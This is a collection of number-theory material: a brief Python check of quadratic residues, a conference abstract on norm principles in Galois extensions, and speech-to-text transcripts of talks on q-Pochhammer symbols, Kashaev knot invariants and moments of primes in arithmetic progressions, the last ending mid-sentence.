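As a quick sanity check on the example just described (G = (Z/2Z)^3, alpha = 2, primes 17, 41, 73, 113, 89, 97): for e = 2 the requirement that alpha be an e-th power modulo each chosen prime says that 2 is a quadratic residue modulo each of them, which a few lines of Python confirm via Euler's criterion. The pairing of the primes and the remaining conditions of the construction are not checked here.

e, alpha, primes = 2, 2, [17, 41, 73, 113, 89, 97]
for p in primes:
    # Euler's criterion: alpha is an e-th power mod p (with p ≡ 1 mod e) iff alpha^((p-1)/e) ≡ 1 (mod p)
    assert p % e == 1 and pow(alpha, (p - 1) // e, p) == 1
print("2 is a square modulo each of", primes)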
|
Let K be a number field, α1,...,αt∈K and G a finite abelian group. We explain how to construct explicitly a normal extension L of K with Galois group G, such that all of the elements αi are norms of elements of L. The construction is based on class field theory and a recent formulation of Tate’s criterion for the validity of the Hasse norm principle.
|
10.5446/53730 (DOI)
|
Thank you. Thanks for the opportunity to talk about this topic during this week. So the main object of this talk is something called q-Pochhammer symbols. First I have to introduce what that is. The Pochhammer symbol is just a short name for something which is a convenient way to denote things in combinatorics, related to binomial coefficients. I'm not at all an expert in combinatorics, but I need to introduce the name because it's important. The quantity which will be interesting for us is not exactly this one, but a q-variant, a q-analogue, which is the following one. So a and q are complex numbers, and the notation in combinatorics is the following one. There won't be much combinatorics in our work; it will be mostly complex analysis and this kind of thing. So these are the quantities. There are many identities and generalizations of binomial coefficients which make sense when you formally replace the Pochhammer symbol by q-Pochhammer symbols; some formulas remain true. More precisely, the case which will be recurrent in this talk is this one: when you set a equal to q, then we forget about the a. So (q)_n will be the case a = q: it's the product of the powers 1 minus q up to 1 minus q to the n. Here n is an integer greater than or equal to 0; if n is 0, the product is empty and equal to 1. And q can be anything. So why are people interested in this? There are many reasons; I will quote four connected ones. First, it appears in partition-related generating series. I will quote some. Of course, there is the partition function, the number of ways to write an integer as a sum of positive integers, denoted p(n). And its generating series is nothing else than, as is easy to see if you group the equal parts of the sum together, an infinite product, which you can denote formally by (q)_n with the limit taken as n tends to infinity. Here q has to be of modulus less than 1 for this formula to make sense. And this product is useful because, for instance, you can obtain the Hardy–Ramanujan theorem on the asymptotic formula for p(n) by exploiting the polar behavior of this product on the unit circle. Secondly, there are many works on finding identities between q-series; it's a big business. I will quote one, which is called the Rogers–Ramanujan identity, and is the following: if you take the summation of q to the n squared divided by the symbol that we had before, then it's equal to a product also involving the q-Pochhammer symbol, but extended to infinity; now I need to use the other notation with the a. It's a product like this one, but restricted by a congruence condition on r modulo 5. Another interesting point is that it's connected to a particular modular form: the function eta, defined on the upper half plane, so for z with positive imaginary part, which is e(z/24) times the Pochhammer symbol extended to infinity. And e(z) here is the 1-periodic exponential function, e to the 2 pi i z. Since the imaginary part of z is positive, this number q = e(z) has modulus strictly less than one, so this makes sense. And saying that this specific function is a modular form means that it satisfies some identities. When you shift z by one, you just have a factor coming out, which is e(1/24), times eta of z. And eta of minus 1 over z is (z over i) to the one half, where z over i has positive real part, so you take the principal determination of the logarithm, times eta of z.
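The formulas described verbally in this passage are classical; for convenience, here is a restatement in the usual notation. This is my transcription of what was presumably on the slides, with e(z) = e^{2 pi i z}:
\[
(a; q)_n = \prod_{k=0}^{n-1} (1 - a q^k), \qquad (q)_n := (q; q)_n = \prod_{r=1}^{n} (1 - q^r), \qquad (q)_0 = 1,
\]
\[
\sum_{n \ge 0} p(n) q^n = \frac{1}{(q; q)_\infty}, \qquad
\sum_{n \ge 0} \frac{q^{n^2}}{(q; q)_n} = \prod_{r \equiv 1, 4 \ (\mathrm{mod}\ 5)} \frac{1}{1 - q^r} \quad (\text{Rogers–Ramanujan}),
\]
\[
\eta(z) = e(z/24)\, (q; q)_\infty, \quad q = e(z), \qquad
\eta(z + 1) = e(1/24)\, \eta(z), \qquad \eta(-1/z) = \sqrt{z/i}\; \eta(z).
\]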
And saying that it's a modular form for this specific function means that it satisfies some identities. So because of course this is one invariant, when you shift z by one, you will just have a factor coming out, which is E of 1 over 24 times eta of z. And eta of minus 1 over z is z over i to the one half. So z over i has real part positive. So you take the principle determination of the logarithm times eta of z. So, okay. So closer to what I discussed today, there has been another line of research that was devoted to study sine products. So this is understanding the size as a complex number. The size and distribution of values of the programmer symbol when the modulus of q is one. Okay, so when this happens, of course, we have that this thing has modulus between 0 and 2. And note that, okay, so I use this. And, okay, so I recall the definition. This is the product from r from 1 to n of 1 minus q to the r. So if you try to imagine this as some kind of free man sum for function, you can, we noticed that the integral between 0 and 1, if you imagine that all these powers at q is a number, a typical number of the unit circle, then all these powers will become uniformly distributed. When you take the logarithm of this, you notice that the modulus, the nodule I tend to compensate each other. So because this holds, there is a lot of consolation you expect that for typical q, at least some consolation happened in this product. So the size of this product relates to the secondary terms in this human sum approximation. So this is a fact that makes this problem, tends to make this problem somewhat difficult. So I mentioned some names. So there is our works of Erdos and Seckeres, like the 50s, I think, followed by work of Södler, the 60s. So for instance, one of their theorems, the theorem of Södler, I think, is the fact that if you fix an n and you compute the maximum of this symbol on the circle, then this is exponential. There is a constant such that this relation holds. So it's n to some power times an exponential growing. So k is some constant. So I mentioned some further names. So Lubinski has studied this problem. And for instance, one of the theorems that he proved is that for a typical q on the for the bag almost all q on the unit circle, the size is actually much less than this. It's not exponentially than it's o of log n to the one plus epsilon for any epsilon. And for q, just one, q almost everywhere for the bag measure on the unit circle. One further work, which is, so this is 1990. Some further very recent work, very nice theorems. This has been revived very recently by Krebsstadt, several others, so Krebsstadt. Sorry, I apologize for this. A captain book, which are in the Norwegian, I think, and I'm going to learn from Linz. And then some two or three works with two or three of all three of these people, then followed by further work, joint is asked this late now. Christopher is now a new plastic now. And the theory of Paulos from Gratz and Benz border. So for deterministic, they studied deterministic q, fixed q, deterministic is a bit over. And especially for q equals the exponential. So on the unit circle with the angle, which is quadratic. A quadratic number. So for instance, what a theorem of Krebsstadt, a captain book and name is the following from 2019. This, the cube for a symbol at the golden ratio is bounded below by one and upper bounded by n. This was open. It's a question which was asked by at least means keep it from the fore. 
Okay, so when we started to study this function, before we knew about so many of these works, we were studying a paper by Zagier; that's the fourth motivation. In this paper, which I will cite as Zagier 2010, called Quantum Modular Forms, he studies many functions, and there is a very funny function in there which is related to knot theory. We don't know anything about knot theory, but the function is not very complicated to write down. I should say that the q-Pochhammer symbol is also a basic component in constructing quantum knot invariants, and not only those: the Jones polynomial and, for us mainly, the invariants associated with this in knot theory, the Kashaev invariants. I won't try to draw a knot, because for knot theory people I would fail miserably, but roughly, a knot is a curve in three dimensions that you can represent by a diagram in two dimensions, with some crossings; it depends on some drawing skills which I don't have here. And to a knot, when you draw it, when you look at the diagram and the crossings and which strand of the knot goes over another, you attach some combinatorics, and from this you can construct invariants. So Kashaev associates to a knot a function, and I will state two examples to show you what it looks like, to make it a bit more concrete. So 4_1 and 5_2 are certain knots; maybe I can show them to you after the talk, because I didn't think of drawing them, I'm sorry about this. The invariant depends on the variable q, and in one of the simplest cases the function is the following: a sum, for n from zero to infinity, of the q-Pochhammer symbol modulus squared. For n equal to zero the product is empty and equal to one; in other words, you take all the successive factors one minus q to the i, in modulus squared. If q has modulus less than one, this of course diverges; if q has modulus bigger than one, it also diverges; but the interesting case for us is when q has modulus exactly one, and in particular when q is the exponential of a rational x, so a root of unity. When q is a root of unity, eventually the factors vanish, so the sum terminates, to some extent for a trivial reason. I will state another one, because I will need it to illustrate a later statement. This one is a bit more complicated to write down, but it shows you that the summands are not always positive: it involves q-bar to some power times the modulus of the Pochhammer symbol squared, and now it's a double sum. There is no x there, it's capital N. What is capital N? It's the denominator, the order of q as a root of unity (with the indices strictly below N, say, otherwise the definition breaks down). Why was Kashaev interested in these invariants? Because they are easy to compute given the knot, and certain asymptotic expansions of the invariant tell you information about the knot itself, about the geometry of the knot, and this is something that interests knot theory. But the reason why we are interested in this function is that it is a very simple-looking function involving the Pochhammer symbol, and there are many things that we still don't quite know about it. So here is a statement. It's called the volume conjecture; it's not a theorem in general, still, but it is a theorem in some cases.
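Before the asymptotic statements, a quick numerical illustration of the first of these two invariants, the Kashaev invariant of the figure-eight knot 4_1, at q = e^{2 pi i / N}: J(q) is the sum over n < N of |(q; q)_n|^2 (the sum stops at N because later terms vanish). The script below is my own toy code, not from any paper; it prints log J / N for a few N, and the value this ratio slowly approaches, Vol(4_1)/(2 pi) with Vol(4_1) approximately 2.02988 the hyperbolic volume of the figure-eight knot complement, is the constant in the volume-conjecture statement discussed next.

import cmath, math

def J_fig8(N):
    """Kashaev invariant of the 4_1 knot at q = exp(2*pi*i/N): sum_{n=0}^{N-1} |(q;q)_n|^2."""
    q = cmath.exp(2j * math.pi / N)
    total, prod = 0.0, 1.0          # prod holds |(q;q)_n|^2, starting with the empty product
    for n in range(N):
        total += prod
        prod *= abs(1 - q ** (n + 1)) ** 2
    return total

for N in (50, 200, 800):
    print(N, math.log(J_fig8(N)) / N)   # slowly approaches Vol(4_1)/(2*pi) ≈ 0.3230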
And the cases that I'll talk about today, it's a theorem. But for generic knot, it's still wide open and not theory people are very, it's an important conjecture, wide open conjecture. So when you go, when you look at the first truth of unity, and you let the order tend to infinity, then they expect that for any such invariant constructed from the knot, and especially the two that I wrote above, there will be an expansion like this. So it will be exponential in n with a CK is some geometric invariant, you think the knot and divided by 2 pi. So it's some constant. Which has a geometric meaning that I want to discuss today. Okay. But then, so this doesn't tell you what happens for other roots of unity. And this is one of the first question which motivated us. So very happy to try to understand this. So you let an irrational be given, it will be between zero and one. Maybe this. And, okay, I will write what will come here afterwards. But what we want to know is what's the size of J for E of X for other kind of rationales. And we can answer this question under, so a generalization of this theorem, which is a theorem of, I wish to take the names afterwards. Understand and Hansen, in the case of four one, we can generalize this statement for other rational functions. So this simple looking function from before, when you evaluate it as a at other rational, it will take the following form. Of course, there is a specific constant here, plus little of one times the quantity which will depend very simply on the on X, simply, yes and no, it's the continuous fraction expansion of X. And so this, if you use a classical notation for the continuous fraction expansion, R is the length. And this asymptotic formula is as the mean value of the AI tends to infinity. If you give you a sequence of rational numbers with their, the mean value of their coefficients standing to infinity, you will get an asymptotic formula for the log of the J invariant, for this case, for the not just not. And so we are very lucky here because this is typically the case. If you take one over N, it will, you obtain back this statement, but this in fact holds for many other rational numbers and actually almost all in a certain sense. That's a corollary. As Q tends to infinity for proportion one plus little of one of rationals. X with denominator, I was okay, I can, okay, I won't be using Q for the denominator, I need to stop doing this. Of denominator less than Q. So you, when you average over all rationals less than, denominator less than Q, when you pick one at random, then for almost all of them, you have the asymptotic formula that this thing is exponential of, so what I wrote before, but it turns out that, that for almost all rational, there is a simple low of large numbers. Well, okay, simple to state, but to prove it, you need to work a bit harder. So we obtained a low of large numbers with the sum of the continuous fraction digits, and from this you can immediately deduce. From this end of previous theorem, you can immediately deduce this statement. So it's a form of low of large numbers for the log of the J invariant introsional numbers. So you can ask about this condition, is it necessary? What? And we're so very happy because Christophe and Benz, Christophe Eisleiter and Benz Borda earlier this year, they obtained a very nice statement, which I'm going to state now. 
So the condition, this condition is actually necessary because of the following theorem of that, so you take one example of a number of which, a very simple example, the simplest example of a number for which the average doesn't go to infinity is when you take all the a i equal to one. And so if you fix for any n x being the rational with all the numbers equal to one, and I will say more about what they can do and what else they can do. So this is a question of two B-Shibonacci numbers. And for these numbers, so this depends on n, then the J function grows exponentially exactly like before, but now the constant is different. So this is the same sum, the sum of the a i, but now the constant is not the same, the constant c is 1.1 something, at least, well numerically, they show that numerically it seems that the function is like this. Maybe they have some proof that the first digits are this, but maybe Benz cannot surface around, but they show that this constant is different than the one from the almost all results above. So the result is much more general and in particular it works for all quadratic rational. So when the expansion is periodic, they can obtain this formula and the constant is not always the same as before. More general. X with quadratic. So now I'll explain a bit why all of a sudden we were talking about this pochameric symbol and then we got into a constant attraction expansion. So before this, maybe I can talk for a few instance and ask if there are any questions. There seems to be one. No, that was on the rule. Okay. There are no questions. There's no question at the moment in the chat. So maybe someone will arise questions. Okay. Seems not the case. So please. Okay, continue. So why is the continued fraction expansion relevant here? Okay. Continue traction expansion. So that's because of the conjecture by the game who observed numerically the following. So you let H of X be, so I will state it only for the variant that I mentioned before, H of X be the log J. See everything happens inside the log. So let's take the log. Leg log J of that function from before at E of X minus log J, same thing as before at E of 1 over X. Then this function, which is defined on Q, is extends to A to A. A nice function of X in R star. So what I mean by nice is, well, not very clearly, the best way I can illustrate this is by showing you a picture. So this is the newspaper, quantum radioforms on 2018. It has lots of 17 pages, but still has a lot of stuff. And he has the following two graphics. So this is a log of the function that we had, plotted at rational numbers. You can see the size grows at the denominator. And then it doesn't look so regular. But if you take the difference between the difference that I just wrote, you obtain this function, which is at least much nicer looking. It's not very clear what we conjecture, but by zooming in at a rational, we see that it has some jumps at rational. So certainly we don't expect it to be continuous. And at irrational numbers, so 1 over phi is here, the golden ratio. And you see, well, okay, it looks continuous. It's not so, doesn't look at all differentiable, but at least we can imagine that the function has a limit. The limit is close to 1.1. And this is related to the values that I showed you before. So let's see, sorry, this one. So let's see. h of X, it looks continuous near the golden ratio or the inverse of the golden ratio. And h at the golden ratio looks close to 1.1. 
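Restating the quantity in Zagier's plots as I understand the verbal description (the exact normalization, for instance whether the second argument is 1/x or -1/x, is on the slide):
\[
h(x) = \log J\bigl(e(x)\bigr) - \log J\bigl(e(1/x)\bigr), \qquad x \in \mathbb{Q}^{\times},
\]
with J the invariant of 4_1 from before. The observation is that h, a priori defined only at rationals, seems to extend to a reasonably nice function on the reals: it has jumps at rationals, appears to be continuous (though not smooth) at irrationals such as the inverse golden ratio, where its value is close to 1.1, and appears to behave like a constant times 1/x as x tends to 0 from the right.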
And this explains, this would explain the theorem that I showed you before, the theorem AB. Okay, let me call this one the generic theorem. And secondly, let me get back to this function. You see, it goes to infinity. And it seems to go to infinity like 1 over X, it seems to go like the constant that I showed you before divided by X. As X goes to zero plus. And this would explain the generic theorem. So sorry, sorry for this. So it would explain the theorem that I called the generic theorem. Why? Well, this is because when you start with evaluating the function at a certain rational, when you replace X by 1 over X, because this is one periodic, you at each time you apply, you replace a continued fraction. Oops, sorry, I should take the log. You replace the continued fraction. So say this is X. I'll get h of X plus. So log J of 1 over X, but 1 over X, what do you do? 1 is just taking away the first coefficient for 1, 0 of E of 0, A2, AR. So if the first coefficient is big, it means that X is very small. And then this will look like C4, 1 times A1. And then when you iterate, you get C4, 1 times A2. Well, of course, these numbers have to be big for this to make sense. And we can only prove this when the average goes to infinity. Okay, yeah, maybe you can keep this section. Okay, so I have a little time to explain to you. Yeah, still have maybe 15 minutes. So I will set you what happens inside the, well, what is the main theorem that is driving everything. So we don't have this conjecture. If we had this conjecture, things would be much easier and also with this information. But we get around this conjecture. By proving two theorems, which are modularity looking, the modularity relation, much like the one I wrote before for eta, let me go back to it for an instant. Much like this one, but having to do with the Pochamer symbol. So the main theorem is that, so there are two. If I give you Q for gamma in SL2z, then the function which 2x and n associates E of x over 24. So this is in Q cross natural numbers. Well, actually cross. So let's see 0, denominator of x minus 1, because then it vanishes afterwards. Let me see. So E of x, so then, so this function, which is interesting for this value, x is rational and n varies between 0 and the denominator of x minus 1 satisfies, satisfies, satisfies a transformation formula. Which, maybe I can show you, show it to you if you want, but it will take some time. So I will concentrate first of this, of this informal description. It's a formula which relates x, which sends x to gamma x like modular iteration, and it sends n to, let's state it like this, yes, it sends n to the floor part of n divided by denominator of x times the denominator of gamma x. And this is a number between 0 and the denominator of gamma x. And this formula is, is exact. 0 term depends holomorphically on the following, on the, the fractional part of this number. So I have to explain to you what I mean by this. And yes, maybe I have time. It will take, I think, some five minutes more to explain the full statement of this theorem. So the first part, the formula that we have, I can show, can show it to you. Actually, I'm wondering, okay, it takes some notation, so more precisely. But the point, there is a point I want to make in this formula. And to make the point, I need to, to actually show the formula, but the formula is not very, not particularly good looking. So to state it, I need to, okay, x as a rational and gamma of x. Here is gamma of x. 
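(As an aside, before the precise formula is set up: the iteration just sketched can be written compactly as follows. This is only the heuristic behind the generic theorem, valid when the partial quotients are large; G denotes the Gauss map and C_{4_1} the constant from before, both my notation.)

If x=[0;a_1,a_2,\dots,a_r] then \{1/x\}=[0;a_2,\dots,a_r]=Gx, and by 1-periodicity of J(e(\cdot)),
\[
\log J(e(x))\;=\;h(x)+\log J(e(Gx))\;=\;\sum_{k=0}^{r-1}h\bigl(G^{k}x\bigr)+O(1).
\]
If moreover h(x)\sim C_{4_1}/x as x\to0^{+} and the a_k are large, then G^{k-1}x\approx 1/a_k, so
\[
\log J(e(x))\;\approx\;C_{4_1}\sum_{k=1}^{r}a_k .
\]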
You can express it using nd on this, but first it will be h over k. Then for one less than r, less than k. If you let l to be the floor part that I wrote before, and lambda to be the fractional part that I wrote before, if you take the quotient between these two things, then this will be, this will be an expo, we can express this exactly as some of many terms. There is the first one which will be maybe ring a bell for people to study cotangent sum. So this is a dedicant sum plus pi i over four plus half log of k over d. I will explain each term. Plus k over q d times something, some function which is related to the logarithm evaluated at this number between zero and one plus nr term which depends on r, lambda, and d over k. The main point is that this term is holomorphic. It's a function which depends on l on lambda. It has an expression depending on lambda which makes it extendable to a holomorphic function. In lambda, so in this set, whatever, it's some other set, more general than this one. And this came as a surprise because all these are finite products. So maybe it doesn't come immediately as a surprise that such a formula exists because when you take out going to infinity, if you could, you would obtain the data kind, the eta function that I wrote before. And the eta function is a modular form. So you might expect something like this to exist. But this is not the infinite product. It's a finite product. And even by taking finite products, you can still, you have still a formula which is useful. It's useful for us. And this is relevant. It's relevant for us when the denominator of x is bounded. This is a case when we can control the error term. And there is a second important agreement that I want to mention in the previous theorem, which is a second relation formula. Now, okay, I won't state it, but there is a second second reciprocity formula. Okay, modularity, sorry, modularity formula, second modularity formula, which relates now it's a bit. There is another layer of complication coming from the fact that it doesn't relate x with gamma x or one over x is going to relate the gamma x bar, which is when x you write it as a irreducible fraction, x bar, which be each you inverse the numerator modulo the denominator. Of course, this depends. This is only defined modulo k. So we take fraction upon. There's a formula which relates this. And basically, it means that when you apply, it allows you to take away not the first coefficient when you is making UK algorithm, but the last coefficient. This transformation going from x to x bar is equivalent to reading the continuous fraction expansion in the reverse order. And there is a reciprocity formula, which relates these two for the Q-PoH symbol. And it's useful for us. So I'm going to lay a bit to make the point more clear. It's useful for us when the denominator of x goes to infinity. So it's actually depends on the way you stated it. But we do stated when which makes it useful when the denominator, the denominator stands to infinity. And this is precisely the complementary, the complementary case of the previous one. So if we could get rid of this condition, we would be getting very close to the guess conjecture. We cannot. We're not able to right now. But by proving this complementary modulity formula, which has a lot of disadvantages, but it has the one big advantage that it's useful as soon as the denominator goes to infinity. And by combining the two, we can successfully iterate the formula. 
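For reference: the "dedicant sum" in the transcription is the classical Dedekind sum, which in its cotangent form reads as below; the same sums appear in the multiplier system of the Dedekind eta function, whose modularity (for instance \eta(-1/\tau)=\sqrt{-i\tau}\,\eta(\tau)) is what the finite formula above mimics. The exact shape of the remaining terms in the formula from the talk is not reproduced here.

\[
s(h,k)\;=\;\frac{1}{4k}\sum_{r=1}^{k-1}\cot\!\Bigl(\frac{\pi r}{k}\Bigr)\cot\!\Bigl(\frac{\pi r h}{k}\Bigr),\qquad \gcd(h,k)=1 .
\]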
And maybe I can finish with the last remark that in this formula, in the formula two, there are some peculiar objects that pop up, which are the following. It's a cotangent sum. So let me say, okay, n, k bar over h maybe. Oh, sorry. Okay, okay, sorry. I confused between the button for go back page and okay cotangent of pi n h bar over k. h inverse over k. This function is one periodic. So this makes sense. But you're okay. Times n over k. And if there was, if the sum was over all, residue, non-zero, residue, modulo k, this would be a cotangent sum. But in this formula, it turns out that very naturally, we didn't, we certainly didn't call for it, that this sum appears when r is restricted to be something else to the k. So it's a partial cotangent sum. And this, okay, we struggled for a long time with this kind of object. It has some reciprocity, but it's not, it's not exact. So, okay, there is something, there was something new going on in this formula that we didn't expect. So if you stumble on something like this, maybe take a look at this pair of paper or Loubinski's paper and let's save you some headaches. And so, yeah, okay, so you can say more about some elements of the proof if someone asked, but otherwise I stop here. Thank you for your attention. Yeah, Saris, thank you very much for this very nice Blackboard talk. So we could end this conference with a Blackboard talk. Of course, in auditorium A1 in Exier, we have much more Blackboards. We have three big ones and some smaller ones. Here is just one Blackboard, but it has one advantage compared to a real Blackboard one. We can go back to any Blackboard. So I have a small question. You introduced this geometric constants somewhere in the first third of the talk. Could you say some words on the geometric interpretation of that constant? Yes, so maybe for this I can find a picture of the knot. So I need to find a picture of the knot. Let me see if it's in the gift paper. Because these interpretation as knots would be really very instructive. Yeah, so let me get right back with the screenshot. I need to find a picture of the 4-1 knot. But if it takes too long, we should postpone it to discussion room or something like that. It's okay, I found it. It's actually on Wikipedia. It wasn't difficult. Okay, so let me see. Yes, so this is the figure 8 knot. This is the 4-1 knot that I was talking about. And when you consider the complement of the knot, so everywhere in the space except inside, it turns out there is a theorem of... Okay, I forgot his name. Okay, that's embarrassing. He's one of the biggest people in this thing. You can put a hyperbolic structure, a metric, on the complement of the space, which makes it a hyperbolic space and it has finite volume. And the constant is the volume of the space. Maybe it's you to make my... Sorry? Maybe it's you to make my own. I don't know, but it could be. No? Okay. Yeah, I don't remember something. I'm sorry. It's not... It's not... It's not... It's not embarrassing. Yes, okay, so he showed that you can decompose the complement space into a simpler hyperbolic space. And when you compute the volume, it's interesting, intrinsic quantity, and the constant is the volume of that. Okay, so thank you for this very nice explanation. Are there other questions? Short ones? Long ones are postponed to the discussion rooms. Yeah, Benze is typing a question. Maybe it will come soon. Yeah, here is... Can you read the question? Yeah, so is it conjecture that the guess function is continuous at every rational? 
And I believe so, yes. It certainly looks so numerically. Of course, one has to be careful with the numerics, and I can show you why; it is a rather amusing illustration. There is a graph from this paper: this is what happens when you compare J at x with J at 1/x, and this is what happens when you compare J at x-bar with J at 1/x-bar. They look more or less the same, but this last function actually goes to plus and minus infinity in the neighbourhood of any rational number. So it looks nice and continuous, but when you zoom in you see that it is not very nice at all. So one has to be careful in formulating the conjecture, but I believe that h(x) is continuous at every rational.
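To summarize two objects from this last part of the talk: the partial cotangent sum as I understood it from the description (the range R and the weight r/k are my reading of the blackboard, so treat them as indicative), and the geometric constant, using the standard facts that the figure-eight knot complement carries a complete hyperbolic structure of finite volume, about 2.0299 (the decomposition into ideal hyperbolic pieces alluded to in the discussion is presumably Thurston's).

\[
c(h,k;R)\;=\;\sum_{r=1}^{R}\cot\!\Bigl(\frac{\pi r\bar h}{k}\Bigr)\frac{r}{k},\qquad h\bar h\equiv1\ (\mathrm{mod}\ k),\quad R<k-1,
\]
\[
C_{4_1}\;=\;\frac{\operatorname{Vol}(S^{3}\setminus 4_1)}{2\pi}\;\approx\;\frac{2.029883\ldots}{2\pi}\;\approx\;0.323 .
\]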
|
This talk will report on work with S. Bettin (University of Genova) in which we obtained exact modularity relations for the q-Pochhammer symbol, which is a finite version of the Dedekind eta function. We will give an overview of some of their useful aspects and applications, in particular to the value distribution of certain knot invariants, the Kashaev invariants, constructed with q-Pochhammer symbols.
|
10.5446/53731 (DOI)
|
So, it's a pleasure to give a talk. Of course, I would have preferred to be in Lumini with all of you, but thank you very much for the organizer, Robert and Joelle. Okay, so my talk will be the second part of the talk of Daniel Chirilly. So it's about higher moments of primes in interval and in arithmetic progressions. So I will focus myself on arithmetical progression. So I will recall the notation. So I will text my summation of prime power with some weights. So remember, I will take the weight 1 over square root of n and then also weight with the eta function. So you can imagine eta as a smooth function where the value is concentrated around zero. So of course, what we expect is the same summation with n co-prime to q with a factor 1 over cq. So my talk will focus on the prove as the asymptotic study of moments where we take the sum over a co-prime to q. So q is fixed larger than 3. Of course, because there is no sense when q is 2. So the main thing to remember is that q is fixed so that we can have a mean value over q. But when you look at such a product, you express this summation with a character with orthogonality and we developed and then we have such expression. So this means that our moments is a link to the summation of our character. So of n characters which are not principal. So chi zero q is the principal character modulus q. But the product is the principal character. So it's an easy exercise. So the point is that we need to evaluate this sum when chi is not principal. So the first step of our proof is to prove an explicit formula. So we take a data to be a differential function which is even and which satisfies such properties. So eta and the derivative of eta is small and t tends to infinity. And also that is very important. So the Fourier transform is positive and is not too big. But the point here is the positivity. So if you need to remember one point in my talk, it's the positivity of the Fourier transform. So then one can prove such explicit formula. So it's not far from the classical explicit formula that we know. And here's the summation. It's over zero of the zeta Riemann function. So I take only the non-trivial zero and I wrote the zero as a one half plus i gamma. So this means that I want to assume the GRH. So if I assume the Riemann hypothesis for all L function, of course gamma is the number is real. And then we can write this formula. But it's also okay when the GRH is not true. So this is our first step. So we will replace this summation by this term with the non-trivial zero of Ls of chi. So then we can introduce a probabilistic model. So we take x, uniform random variable on zero one. And we define z index gamma, such as the exponential of 2 pi i gamma x. And then for n larger than 2, we define such a summation. So then we see that the expectation of the product of z gamma random variables is one if the sum of the gamma is zero and is zero if not. Okay, so in particular, this implies that the formula for the expectation of the random variable h of n q eta. And so this is a very important formula because one can show that such an expression is limiting the distribution of m n. Okay. So the second step is that we want to study moment of moment. So this is the second key step in our proof is that we want to study the moment of the moment over a. So we take phi l one function even classical and we have this formula. So this means that if we take the moment of n, then we can express it in function of the zero of l function. So you see, so chi. 
It will be n time s character here. So we can indexes. We can index the character like in a matrix. Then they all need to be different from the principal character and the product of an array is a principal. And then for each character, we have zero of the l function associated to the character and then we have a double summation over the character and then over the zero associated to this character. Then I have written it out of the gamma as a product of all the foyer transform of it are in gamma of 2 pi and I have written also the sum of over all the zero time one of a 2 pi. I wrote it sigma index gamma. So imagine if we take a t in large, we replace this moment of moment by a summation over s time n character summation over s time n zero. So take s equal one, the previous formula and take t tends to infinity. Then we will find back smaller mn q theta, the mean value or the expectation of the random variable of the model. So now I will study the center moment here. So I will not take the empirical expectation, but I will take the expectation of the model. This is very important for technical reason. I don't know what would happen with the empirical expectation. So if we replace in this formula, all we know about this moment, we replace by the summation of the character over the zero. Then we have this formula. So I recall here the notation and here a new notation, capital delta index s is a formula s by a sum over a subset of one s is a coefficient minus one power s minus the cardinality of i times the Fourier transform of the fifth function times product over index mu that it doesn't belong to i and delta zero is a direct function. So I mean so if it's zero, it's one. And if it's not zero, it's zero. And one part is very important is that we can prove an inequality between this function and another function, a delta function, which is in fact the limit of this function when t tends to infinity. So it's a nice formula and I will show soon how to prove it. So in fact, the limit of the delta function when t tends to infinity is one. If the summation over all sigma mu is zero, one or all sigma mu is not zero. So this means that if there exists an index mu such that sigma mu is zero, then it's zero. And if not, we need to know if it's one. We need to check that the summation of sigma mu is one. Okay. So I wrote again as the same formula and I want to give you some idea of the proof. Very simple, but I think it's a nice result. So I wrote the case set is a set of mu such that sigma mu is not zero. So when we look at this function, in fact, it is a summation, Fourier transform of phi function taking t times the sum over not i, but over the k set, which is defined here, times the function who controls the fact that k is a subset of i. So it's one if k, it's included in i and zero otherwise. Then we can replace this expression in the definition of delta of s and we can have a we can factorize as this expression by this quantity which depends only on sigma. And then we have such a nice sum, which is zero, always zero. If k is not the set one dot dot s. So this means that this is we have zero if one of sigma mu is zero. And then if not, we have such an expression and then of course we see that if t tends to infinity, this is tends to zero except if this summation is zero. Okay, so this is the end of the proof. So I am aligned that the positivity condition is very important. And we compare of moments of moments to the moments of the model. 
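For orientation before the inequality: this is the random model being compared against, as stated in the talk (X uniform on [0,1]; the expectation identity is quoted as given, presumably in the appropriate limiting sense):

\[
Z_{\gamma}\;=\;e(\gamma X)\;=\;e^{2\pi i\gamma X},\qquad
\mathbb{E}\Bigl[\prod_{i=1}^{n}Z_{\gamma_i}\Bigr]=
\begin{cases}
1, & \gamma_1+\cdots+\gamma_n=0,\\
0, & \text{otherwise.}
\end{cases}
\]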
This means that we have a very nice inequality such that to the moments times minus power s time n is bigger than this moment associated to the probabilistic model times an error term. And I wrote it again as a notation. Okay, so how to resume this party. This means that since to the positivity condition, we can prove a lower band of moments by the moment of the probabilistic model. It's a very nice result. It's a pity because we can prove the upper band, but it's a very nice result. And then now I will try to see how to estimate the moment associated to the probabilistic model. And then I would like to introduce the hypothesis LE. So LE is for linear independent. So hypothesis LE assumes that there is no non-privileged linear relation between zero of L function. When Chi is a character modulo q, you can assume also that the character is non-principled. It's a very, very powerful hypothesis. I mean, we have no clue how to prove it. There is no result. There is no intermediate result. So this means it's very powerful. So we would like to see why it can be useful for our problem. So take gamma 1, gamma n, the ordinate of non-privileged zero of the function of the L function. And if we assume a GRI and LI, then this relation implies that n is even, so it can be written as 2m. And there is elements that we can split in two parts, i1, im, j1, jm. And they are the element of set 1 to 2m. And the very important part is here. So we have a relation between gamma. So the ordinate of the one of the zero is the opposite of the ordinate of the other zero. So we have the sum of the gamma is zero. And then there is also a relation between the character. So this means that one of the characters is the conjugate of the other one. So I mean in such a linear relation for me is what I assume a trivial relation. Of course if gamma is the zero of the L function associated to a character, the opposite, I mean one of plus minus i gamma is again a zero, but the L function associated to the conjugate character. Okay. And then there is an easy consequences. So under LII hypothesis, the expectation of such a random variable, so with an odd exponent is zero. Why? Because if we look at the summation of all the zero, there is an odd number of zero. And it's not possible under LII. Okay. Okay. So the problem is that I said that hypothesis LII is very powerful. That means we don't want to assume such an hypothesis. We believe that it's true, but it's very strong. So we have to study such a condition. And we restrict our summation over zero set, satisfying LII conditions. That means as we have the positivity condition, we can restrict our sum over zero. Which satisfies some extra conditions. So we assume that our zero satisfies any condition. But I mean we don't need to assume LII hypothesis. We just restrict our set over such a zero. Then so we can introduce some combinatorial object. Let's take S be even easier. Because in the other case, the combinatorial aspect is much more complicated. So we introduce a set of involutions between the Cartesian product of 1 and 2R times 1 and n. And we assume there is no fixed point. We have such a relation between nuj and the major by p of nuj. Of course, for a set of zero on the character, such an inversion by can be not unique. But we will restrict on a set where it is unique. And one point is very important to study is that we will introduce the set capital J of mu nu depend of two index mu and nu between 1 and 2R. And then we define the set of small j. 
